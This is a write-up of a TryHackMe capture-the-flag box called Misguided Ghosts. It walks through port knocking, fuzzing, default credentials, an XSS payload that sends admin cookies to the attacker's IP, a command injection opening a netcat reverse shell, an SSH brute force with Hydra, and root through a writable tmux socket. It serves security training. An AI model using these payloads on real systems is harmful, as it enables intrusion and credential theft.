Nov 09, 2020
Overview
How i got root in Misguided Ghosts Machine from TryHackMe.
Target Informations
Machine Name : Anonymous Playground IP Adress : 10.10.29.172 Decription : Explore your inner daemons with this hard box! Difficulty : Rated Hard
Discovery & reconnaissance
We Start by scaning our target Host :
PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_drwxr-xr-x 2 ftp ftp 4096 Aug 28 18:11 pub | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.9.123.226 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 2 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 d9:91:89:96:af:bc:06:b9:8d:43:df:53:dc:1f:8f:12 (RSA) | 256 25:0b:be:a2:f9:64:3e:f1:e3:15:e8:23:b8:8c:e5:16 (ECDSA) |_ 256 09:59:9a:84:e6:6f:01:f3:33:8e:48:44:52:49:14:db (ED25519) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
We got 2 open ports, ftp and ssh, Anonymous FTP login is allowed, means we dont need a password to access ftp.
Enumerating FTP
I used ncftp client to login into ftp, a cool client by the way.
m3dsec@local:~/misguidedghosts.thm$ ncftp 10.10.29.172 NcFTP 3.2.5 (Feb 02, 2011) by Mike Gleason (http://www.NcFTP.com/contact/). Connecting to 10.10.29.172.. (vsFTPd 3.0.3) Logging in.. Login successful. Logged in to 10.10.29.172. ncftp / > ls -lat drwxr-xr-x 2 ftp ftp 4096 Aug 28 18:11 pub drwxr-xr-x 3 ftp ftp 4096 Aug 18 18:32 .. drwxr-xr-x 3 ftp ftp 4096 Aug 18 18:32 . ncftp / > cd pub Directory successfully changed. ncftp /pub > ls -lat drwxr-xr-x 2 ftp ftp 4096 Aug 28 18:11 . -rw-r--r-- 1 ftp ftp 103 Aug 28 18:11 info.txt -rw-r--r-- 1 ftp ftp 248 Aug 26 18:51 jokes.txt drwxr-xr-x 3 ftp ftp 4096 Aug 18 18:32 .. -rw-r--r-- 1 ftp ftp 737512 Aug 18 18:12 trace.pcapng
Withing FTP we can see several files, one of them is a pcapng captured data, sounds interesting, but 1st lets read what inside the other files:
m3dsec@local:~/misguidedghosts.thm/files/ftp$ cat info.txt
I have included all the network info you requested,
along with some of my favourite jokes.
- Paramore
m3dsec@local:~/misguidedghosts.thm/files/ftp$ cat jokes.txt Taylor: Knock, knock. Josh: Who's there? Taylor: The interrupting cow. Josh: The interrupting cow-- Taylor: Moo Josh: Knock, knock. Taylor: Who's there? Josh: Adore. Taylor: Adore who? Josh: Adore is between you and I so please open up!
Alright, only from those 2 files, we can grab several usernames (Paramore,Josh,Taylor)
and the fact that "Knock, knock" could means the well known Port Knocking Technique
Port Knocking And Rescaning The network
Looking at the pcap file revealed the Host was likely using port knocking,
For This i used knockd after it i sleep so the knock take its place then i rescan the host:
m3dsec@local:~$ knock 10.10.29.172 7864 8273 9241 12007 60753 && sleep 1 && rustscan -a 10.10.29.172 -b 65535 .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : https://discord.gg/GFrQsGy : : https://github.com/RustScan/RustScan : -------------------------------------- 🌍HACK THE PLANET🌍 [~] The config file is expected to be at "/home/m3dsec/.rustscan.toml" [!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers [!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. Open 10.10.29.172:21 Open 10.10.29.172:22 Open 10.10.29.172:8080 ... PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_drwxr-xr-x 2 ftp ftp 4096 Aug 28 18:11 pub | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.9.123.226 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 1 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 d9:91:89:96:af:bc:06:b9:8d:43:df:53:dc:1f:8f:12 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9IDvQd1gdoX05XWxhJT/V9SmKjyuZF45PHMiFEBOB3tDCcnBjFU7MeB+hRxYIVQ/gDupx4T9eBmh3f/v6N/cP2saOkCP1CsmaBANAwFe2t6jdKBnzzxb95J2xAAQgXlthLcMRzq07jqOu0eNT+m/Cq6mRo/bWCgx33OpUhILmAqXXgACw6eslNS8qxCh2/zCQVV2bfTydc3XMTATbWBoPq/mImFfnm0UumErn2uGQYiKFgKFJwV3hpG5fsqrYeWWFZmukljyn8sbjEctH7U19Bbb/9V1G9HjRZYBOTApm+7Ds3axxbrrqF/f9QDdCbu91yAi4mVeqOhjOIF/GCN/T | 256 25:0b:be:a2:f9:64:3e:f1:e3:15:e8:23:b8:8c:e5:16 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCDsj0erpJ38s3yq182eEiOigD4wlNXRcY7nkWD7hHi89SNGO3WjPLqZxtWDMMn8CD8Bzf8zZBFFsZteCGimotw= | 256 09:59:9a:84:e6:6f:01:f3:33:8e:48:44:52:49:14:db (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMFWXM1xds09Lx7X42b+YR+kfDp1G1IxAU+bS7hXEKjO 8080/tcp open ssl/http syn-ack Werkzeug httpd 1.0.1 (Python 2.7.18) | http-methods: |_ Supported Methods: GET | ssl-cert: Subject: commonName=misguided_ghosts.thm/organizationName=Misguided Ghosts/stateOrProvinceName=Williamson Country/countryName=TN/localityName=Franklin/emailAddress=zac@misguided_ghosts.thm | Issuer: commonName=misguided_ghosts.thm/organizationName=Misguided Ghosts/stateOrProvinceName=Williamson Country/countryName=TN/localityName=Franklin/emailAddress=zac@misguided_ghosts.thm | Public Key type: rsa | Public Key bits: 4096 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2020-08-11T16:52:11 | Not valid after: 2021-08-11T16:52:11 | MD5: 81a2 a5d0 19ea 9ef4 37e9 ebfd b6cc 6d9f | SHA-1: 0ea3 45de 594b 091c 1972 8e43 a7da d929 78c5 0a02 | -----BEGIN CERTIFICATE----- | MIIGIzCCBAugAwIBAgIUe1l5EK+Cz0bL9EgjYIbyYgsm/HMwDQYJKoZIhvcNAQEL | BQAwgaAxCzAJBgNVBAYTAlROMRswGQYDVQQIDBJXaWxsaWFtc29uIENvdW50cnkx ... | zQrf2PYctdAzxHq25O/ZIfYZYjIwVGaiIZiMxj/p2FQcVjdgId9aPWdvfeXfVnnk | mvRdTCtOJzU4PZeuUUMp/PlUzxrMcq7Y5wSSEPLxXFJ7Gg5jjc2uiqIDXv22qSfY | +aNVowOwh9V0MHKtutzcIKAvbwN9S9AmWOvNmAGu6N+yTj2r0uTE |_-----END CERTIFICATE----- Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
As we can see Port Knocking disclosed another Port 8080, a Werkzeug daemon, with a Self-signed certificate.
Bruteforcing Directories & Login Bypass
m3dsec@local:~/misguidedghosts.thm$ ffuf -c -u https://10.10.29.172:8080/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt https://10.10.29.172:8080/login [Status: 200, Size: 761, Words: 107, Lines: 29] https://10.10.29.172:8080/dashboard [Status: 302, Size: 219, Words: 22, Lines: 4] https://10.10.29.172:8080/console [Status: 200, Size: 1985, Words: 411, Lines: 53]
Disclosed an intersting login page :eyes:
Tried Diffrent Bypassing techniques, nothing came out, checking the ssl certificat gave us a username
I Kinda Throw it directly as zac:zac, and it worked, The user was the same as the password
Obviously "Create a post below; admins will check every two minutes so don't be rude." Give us a big hint that this is a Client-Side attack, So i assumed its an XSS attack and this is the payload i used to grab the admin cookies:
<sscriptcript>var i = new Image();i.src="http://10.9.123.226/"+document.cookie;</sscriptcript>
After 2 minutes, i got the admin cookies back
But tho the admin Dashboard was useless, so i brute forced again with the admin cookies :
m3dsec@local:~/misguidedghosts.thm$ fuf -c -u https://10.10.29.172:8080/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -b 'login=hayley_is_admin' https://10.10.29.172:8080/login [Status: 200, Size: 761, Words: 107, Lines: 29] https://10.10.29.172:8080/dashboard [Status: 302, Size: 219, Words: 22, Lines: 4] https://10.10.29.172:8080/photos [Status: 200, Size: 761, Words: 107, Lines: 29] https://10.10.29.172:8080/console [Status: 200, Size: 1985, Words: 411, Lines: 53]
Once Again We tripped Against an upload Form, i tested file upload vulnerability on it, but it always gave the same output everytime, so i start fuzzing, i tripped against the -1 as an input, and the application listed back all the files.
m3dsec@local:~$ curl -s -k -b 'login=hayley_is_admin' 'https://10.10.29.172:8080/photos?image=-1' |grep -i '<pre>' -A4000
<pre>Dockerfile
app.py
cert.pem
key.pem
requirements.txt
start.sh
static
stop.sh
templates
...
And injectign id command throw back the user and group information :
m3dsec@local:~$ curl -s -k -b 'login=hayley_is_admin' 'https://10.10.29.172:8080/photos?image=;id' |grep -i '<pre>' -A4000 <pre>Dockerfile app.py cert.pem key.pem requirements.txt start.sh static stop.sh templates uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video) ...
We then tried to reverse a Shell :
m3dsec@local:~$ curl -s -k -b 'login=hayley_is_admin' 'https://10.10.29.172:8080/photos?image=rm${IFS}/tmp/f;mkfifo${IFS}/tmp/f;cat${IFS}/tmp/f|/bin/sh${IFS}-i|nc${IFS}10.9.123.226${IFS}9991>/tmp/f'
Back To our listener, we can see our Reverse Shell popup. and voila we got root.
😂 naah im just kidding, we where actually inside a docker container wich is fun actually.
Local System Enumeration
Once inside the target host, we start enumerating Internally, we got 2 interesting files from the user zac home directory
/home/zac/notes # ls -lat total 16 drwxr-xr-x 3 root root 4096 Nov 10 14:39 .. drwxrwxr-x 2 1001 1001 4096 Aug 26 02:11 . -rw-r--r-- 1 1001 1002 270 Aug 25 00:34 .secret -rw-r--r-- 1 1001 1002 1675 Aug 25 00:14 .id_rsa /home/zac/notes # cat .secret Zac, I know you can never remember your password, so I left your private key here so you don't have to use a password. I ciphered it in case we suffer another hack, but I know you remember how to get the key to the cipher if you can't remember that either. - Paramore /home/zac/notes # cat .id_rsa -----BEGIN RSA PRIVATE KEY----- NCBXsnNMYBEVTUVFawb9f8f0vbwLpvf0hfa1PYy0C91sYIG/U5Ss15fDbm2HmHdS CgGHOkqGhIucEqe4mrcwZRY3ooKX2uB8IxJ6Ke9wM6g8jOayHFw2/UPWnveLxUQq 0Z/g9X5zJjaHfPI62OKyOFPEx7Mm0mfB5yRIzdi0NEaMmxR6cFGZuBaTOgMWRIk6 aJSO7oocDBsVbpuDED7SzviXvqTHYk/ToE9Rg/kV2sIpt7Q0D0lZNhz7zTo79IP0 TwAa61/L7ctOVRwU8nmYFoc45M0kgs5az0liJloOopJ5N3iFPHScyG0lgJYOmeiW QQ8XJJqqB6LwRVE7hgGW7hvNM5TJh4Ee6M3wKRCWTURGLmJVTXu1vmLXz1gOrxKG a60TrsfLpVu6zfWEtNGEwC4Q4rov7IZjeUCQK9p+4Gaegchy1m5RIuS3na45BkZL 4kv5qHsUU17xfAbpec90T66Iq8sSM0Je8SiivQFyltwc07t99BrVLe9xLjaETX/o DIk3GCMBNDui5YhP0E66zyovPfeWLweUWZTYJpRsyPoavtSXMqKJ3M4uK00omAEY cXcpQ+UtMusDiU6CvBfNFdlgq8Rmu0IU9Uvu+jBBEgxHovMr+0MNMcrnYmGtTVHe gYUVd7lraZupxArh1WHS8llbj9jgQ5LhyAiGrx6vUukyFZ8IDTjA5BmmoBHPvmbj mwRx+RJNeZYT3Pl/1Qe8Uc4IAim3Y7yzMMfoZodw/g2G2qx4sNjYLJ8Mry6RJ8Fq wf2ES1WOyNOHjQ2iZ1JrXfJnEc/hU1J3ZLhY7p6oO+DAd7m5HomDik/vUTXlS3u1 A1Pr4XRZW0RYggysRmUTqVEiuTIMY4Y0LhIbY/Vo8pg6OTyKL0+ktaCDaRXEnZBp VU1ABBWoGPfXgUpEOsvgafreUVHnyeYru8n4L8WB/V7xUk56mcU6pobmD3g19T6n ddocO8sVX6W8mhPVllsc6l+Xl4enJUmReXmXaiPiHoch1oaCgrYYmsONThM7QUut oOIGdb6O/3qfZA+V+EIm3tP+3U/+RsurKmrpVIFWzRIRuj90aBhOzNBsAHloOlOB LCuVjI5M6VuXJ+YY9M9biS2qafFUgIUaKYMVdzDtJFkMhACpJqpy+w6owW0hn3vA H6gpsbnl3zm3ey0JMqnDbwWqKFWTU6DK8V5o6whXZJRXJb1Lxs38PiAry9TPRGVA M5EY0XxjniOoesweDGHryeJNeZV9iRP/CAV0LGDx7FAtl3a7p3DGb2qz0FL6Dyys vgh73EndW0xa6N8clLyA1/GR5x54h+ayGzMQa8d4ZdAhWl+CZMpTjqEEYKRL9/Xc eXU3MNVuPeDrqdjYGg+4xXtSaLwSbOmGwH/aED2j4xxgraMo3Bp+raHGmOEex/RL 1nCbZKDUkUP3Cv8mc9AAVs8UN6O6/nZo1pISgJyPjuUyz7S/paSz04x7DjY80Ema r8WpMKfgl3+jWta+es1oL6DtD9y7RD5u9RPSXGNt/3QwNu+xNlle39laa8UZayPI VhBUH4wvFSmt0puRjBgE6Y5smOxoId18IFKZL1mko1Y68nLNMJsj -----END RSA PRIVATE KEY-----
The RSA key seems odd, We know that every PEM body starts with the characters MII, but here we have NCB instead, the key must be rotated somehow.
Vigenere Cipher Sounds like a good condidate, knowing A Plain Text Word from the decrypted cipher we can decipher our private key, for this i used vigenereBruteForce a pretty nice implementation to bruteforce Vigenere Cipher.
Within CyberChef We decipher our private key :
Fix the tail and header, and login as zac user with the final deciphered private key
Inspecting Open Ports inside the target host, We can see an open SMB port.
zac@misguided_ghosts:~$ ss -tunlp Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port udp UNCONN 0 0 0.0.0.0:37772 0.0.0.0:* udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:* udp UNCONN 0 0 10.10.29.172%eth0:68 0.0.0.0:* tcp LISTEN 0 128 127.0.0.53%lo:53 0.0.0.0:* tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:* tcp LISTEN 0 50 127.0.0.1:445 0.0.0.0:* tcp LISTEN 0 50 127.0.0.1:139 0.0.0.0:* tcp LISTEN 0 128 127.0.0.1:46315 0.0.0.0:* tcp LISTEN 0 32 *:21 *:* tcp LISTEN 0 128 [::]:22 [::]:* tcp LISTEN 0 50 [::1]:445 [::]:* tcp LISTEN 0 50 [::1]:139 [::]:* zac@misguided_ghosts:~$
As the target host doesn't include SMB system related tools, like smbmap or smbclient, i'll be reverse port forwarding port 445 to my local machine for furthur investigation:
zac@misguided_ghosts:~$ ssh -R 4455:127.0.0.1:445 m3dsec@10.9.123.226 -N -f The authenticity of host '10.9.123.226 (10.9.123.226)' can't be established. ECDSA key fingerprint is SHA256:jtZPaZGzdQgns9gmC6kIZWaQhNeG2vYZflH/wGMqnq0. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '10.9.123.226' (ECDSA) to the list of known hosts. m3dsec@10.9.123.226's password: zac@misguided_ghosts:~$
Back To my host we see the new open smb port, lets explore it :
m3dsec@local:~/misguidedghosts.thm$ ss -tunlp|grep 445 tcp LISTEN 0 128 127.0.0.1:4455 0.0.0.0:* tcp LISTEN 0 128 [::1]:4455 [::]:* m3dsec@local:~/misguidedghosts.thm$ smbclient -L \\\\127.0.0.1 -p 4455 Enter WORKGROUP\m3dsec's password: Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers local Disk Local list of passwords for our services IPC$ IPC IPC Service (misguided_ghosts server (Samba, Ubuntu)) SMB1 disabled -- no workgroup available
The Folder local Sounds interesting:
m3dsec@local:~/misguidedghosts.thm$ smbclient \\\\127.0.0.1\\local -p 4455 Enter WORKGROUP\m3dsec's password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Wed Aug 26 15:31:28 2020 .. D 0 Tue Aug 25 01:00:53 2020 passwords.bak N 160 Wed Aug 26 15:31:28 2020 mg 19475088 blocks of size 1024. 8564688 blocks available smb: \> mget passwords.bak Get file passwords.bak? yes getting file \passwords.bak of size 160 as passwords.bak (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec) smb: \>
The passwords.bak file contain some passwords,
m3dsec@local:~/misguidedghosts.thm$ cat passwords.bak pft7vPl HQ@5Y64 Ls7kZxv ...
BruteForcing hayley SSH account against that passwords list, We successfully BruteForced that hayley ssh account:
m3dsec@local:~/misguidedghosts.thm$ hydra -l hayley -P passwords.bak ssh://10.10.29.172 Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-11-10 12:14:37 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 20 login tries (l:1/p:20), ~2 tries per task [DATA] attacking ssh://10.10.29.172:22/ [22][ssh] host: 10.10.29.172 login: hayley password: ******* 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-11-10 12:14:40
Then We ssh as user hayley with the password we retrived.
Local Privilege Escalation
Furthur Enumeration was done, untill we got an interesting Processes
hayley@misguided_ghosts:~$ id uid=1000(hayley) gid=1000(hayley) groups=1000(hayley),1002(paramore) hayley@misguided_ghosts:~$ ps aux|grep root ... root 1028 0.0 0.1 28540 2416 ? Ss 17:22 0:00 /usr/bin/tmux -S /opt/.details new -s vpn -d ...
The Flag -S point to /opt/.details is used to specify the server socket path for Tmux,
hayley@misguided_ghosts:~$ ls -lat /opt/.details
srw-rw---- 1 root paramore 0 Nov 10 17:22 /opt/.details
On this situation our groupe (paramore) have the read-write permission over Tmux socket file, means that Tmux is prone to a local privilege-escalation vulnerability, We can easly Exploit this by Running Tmux withing the context of the same Path:
hayley@misguided_ghosts:/var/tmp$ tmux -S /opt/.details # id uid=0(root) gid=0(root) groups=0(root) # cd /root # ls root.txt # cat root.txt {p1v**********un}
Conclution :
Tryhackme is getting better and way better everyday, also Thanks to Jake Ruston and Bob Loblaw for such an amazing experiance.
Best Regards